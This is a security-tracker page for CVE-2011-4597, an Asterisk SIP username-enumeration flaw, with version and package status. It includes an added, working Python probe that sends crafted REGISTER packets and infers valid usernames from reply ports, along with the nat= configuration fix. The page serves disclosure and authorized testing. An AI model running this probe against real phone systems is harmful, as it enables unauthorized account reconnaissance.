CVE-2011-4597
Published: 15 December 2011
The SIP over UDP implementation in Asterisk Open Source 1.4.x before 1.4.43, 1.6.x before 1.6.2.21, and 1.8.x before 1.8.7.2 uses different port numbers for responses to invalid requests depending on whether a SIP username exists, which allows remote attackers to enumerate usernames via a series of requests.
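The practical check for this leak, as an added example that is not code from the Ubuntu tracker or the Asterisk project: the upstream advisory for this issue (AST-2011-013) ties the differing reply port to inconsistent nat= settings between [general] and individual peers, which decide whether Asterisk answers to the request's source port or to the port advertised in the Via header. The probe below encodes that assumption: it binds two local UDP ports, sends a REGISTER from one while the Via header names the other, and records which port the reply lands on. A username that certainly does not exist gives the baseline; wordlist entries that are routed differently are the candidates. The addresses (192.0.2.10, pbx.example), ports and the usernames are assumptions; run it only against a PBX you are authorized to test.

```python
"""Probe for the CVE-2011-4597 reply-port side channel in Asterisk SIP over UDP.

Added example, not taken from the tracker page or the Asterisk project. The
mechanism assumed (reply goes to the source port or to the Via port depending
on the peer's nat= setting) follows upstream advisory AST-2011-013.
"""
from __future__ import annotations

import random
import select
import socket
import string
from typing import Optional

SIP_PORT = 5060  # assumption: the PBX listens on the default SIP/UDP port


def _token(n: int = 12) -> str:
    """Random alphanumeric token for branch, tag and Call-ID values."""
    return "".join(random.choices(string.ascii_lowercase + string.digits, k=n))


def build_probe(username: str, target_host: str, local_ip: str, via_port: int,
                branch: Optional[str] = None, call_id: Optional[str] = None) -> bytes:
    """Build a minimal REGISTER for `username` whose Via sent-by port is `via_port`.

    The datagram is sent from a different local port, and no `rport` parameter
    is added, so the server has to choose one of the two ports on its own.
    """
    branch = branch or _token()
    call_id = call_id or _token(20)
    lines = [
        f"REGISTER sip:{target_host} SIP/2.0",
        f"Via: SIP/2.0/UDP {local_ip}:{via_port};branch=z9hG4bK{branch}",
        f"From: <sip:{username}@{target_host}>;tag={branch}",
        f"To: <sip:{username}@{target_host}>",
        f"Call-ID: {call_id}@{local_ip}",
        "CSeq: 1 REGISTER",
        f"Contact: <sip:{username}@{local_ip}:{via_port}>",
        "Max-Forwards: 70",
        "Content-Length: 0",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def parse_status(data: bytes) -> Optional[int]:
    """Return the status code of a SIP response, or None if `data` is not a response."""
    first = data.split(b"\r\n", 1)[0]
    parts = first.split(b" ", 2)
    if len(parts) < 2 or not parts[0].startswith(b"SIP/2.0"):
        return None
    try:
        return int(parts[1])
    except ValueError:
        return None


def classify_port(reply_port: int, src_port: int, via_port: int) -> str:
    """Name the local port the reply arrived on: the real source port or the Via port."""
    if reply_port == src_port:
        return "source-port"
    if reply_port == via_port:
        return "via-port"
    return "other"


def probe(target_host: str, username: str, local_ip: str, src_port: int,
          via_port: int, timeout: float = 2.0) -> tuple[str, Optional[int]]:
    """Send one probe; return (port class, status code), or ("no-response", None) on timeout."""
    src = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    via = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        src.bind((local_ip, src_port))
        via.bind((local_ip, via_port))
        src.sendto(build_probe(username, target_host, local_ip, via_port),
                   (target_host, SIP_PORT))
        ready, _, _ = select.select([src, via], [], [], timeout)
        for sock in ready:
            data, _ = sock.recvfrom(65535)
            return classify_port(sock.getsockname()[1], src_port, via_port), parse_status(data)
        return "no-response", None
    finally:
        src.close()
        via.close()


def flag_candidates(observations: dict[str, str], baseline: str) -> list[str]:
    """Usernames whose reply routing differs from `baseline`, the class observed for a
    username that certainly does not exist (a long random token)."""
    return sorted(u for u, cls in observations.items() if cls != baseline)


if __name__ == "__main__":
    # Usage sketch against an assumed PBX: baseline with a random username, then a wordlist.
    target, me = "pbx.example", "192.0.2.10"
    baseline, _ = probe(target, _token(24), me, 5062, 5070)
    seen = {u: probe(target, u, me, 5062, 5070)[0] for u in ["alice", "bob", "1001"]}
    print("baseline:", baseline, "candidates:", flag_candidates(seen, baseline))
```

The status code of the reply is deliberately not used for the decision: a hardened server answers every probe identically (401 or 403), and the whole point of this issue is that the transport-level choice of reply port can still differ. Consistent with the note below that upstream shipped only a documentation change, the defence is configuration, not code: give every peer the same effective nat= behaviour as [general], so replies to existing and non-existing users are routed the same way and the baseline and wordlist probes become indistinguishable.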
Notes
Author | Note |
---|---|
jdstrand | per upstream, no fix issued, only a documentation change. Upstream releases contain these documentation updates |
Priority
Status
Package | Release | Status |
---|---|---|
asterisk (Launchpad, Ubuntu, Debian) | hardy | Ignored (end of life) |
asterisk | lucid | Ignored (end of life) |
asterisk | maverick | Ignored (end of life) |
asterisk | natty | Ignored (end of life) |
asterisk | oneiric | Ignored (end of life) |
asterisk | precise | Not vulnerable (1:1.8.10.1~dfsg-1ubuntu1) |
asterisk | quantal | Not vulnerable |
asterisk | raring | Not vulnerable |
asterisk | saucy | Not vulnerable |
asterisk | upstream | Released (1.4.43, 1.6.2.21, 1.8.7.2) |
Patches: vendor: http://www.debian.org/security/2011/dsa-2367 |